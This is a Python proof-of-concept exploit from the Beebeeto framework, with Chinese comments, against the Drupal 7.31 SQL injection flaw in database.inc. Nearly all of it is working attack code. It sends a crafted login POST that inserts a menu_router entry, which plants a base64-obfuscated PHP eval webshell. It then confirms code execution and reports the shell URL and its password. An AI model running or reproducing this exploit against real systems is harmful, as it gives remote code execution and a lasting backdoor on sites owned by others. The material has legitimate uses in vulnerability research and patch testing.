http://www.beebeeto.com/pdb/poc-2014-0100/
#!/usr/bin/env python # coding=utf-8 """ Site: http://www.beebeeto.com/ Framework: https://github.com/ff0000team/Beebeeto-framework """ # 漏洞分析:https://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6 import urllib import urllib2 from baseframe import BaseFrame class MyPoc(BaseFrame): poc_info = { # poc相关信息 'poc': { 'id': 'poc-2014-0100', 'name': 'Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit', 'author': 'Ricter', 'create_date': '2014-10-21', }, # 协议相关信息 'protocol': { 'name': 'http', 'port': [80], 'layer3_protocol': ['tcp'], }, # 漏洞相关信息 'vul': { 'app_name': 'Drupal', 'vul_version': ['<=7.31'], 'type': 'Code Execution', 'tag': ['Drupal漏洞', '代码执行漏洞', 'SQL注入漏洞', 'PHP', 'GETSHELL'], 'desc': ''' Drupal 7.31 /includes/database/database.inc在处理IN语句时,展开数组时key带入SQL语句导致SQL注入, 可以添加管理员、造成信息泄露,利用特性也可 getshell。 ''', 'references': ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'], }, } @classmethod def exploit(cls, args): url = args['options']['target'] webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>' payload = "name[0;insert into menu_router (path, page_callback, access_callback, " \ "include_file, load_functions, to_arg_functions, description) values ('<" \ "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \ "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \ "rm_id=user_login_block" if args['options']['verbose']: print '[*] Request URL: ' + url print '[*] POST Content: ' + payload urllib2.urlopen(url, data=payload) request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);") response = urllib2.urlopen(request).read() if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response: args['success'] = True args['poc_ret']['vul_url'] = url args['poc_ret']['Webshell'] = webshell_url args['poc_ret']['Webshell_PWD'] = 'e' return args args['success'] = False return args verify = exploit if __name__ == '__main__': from pprint import pprint mp = MyPoc() pprint(mp.run())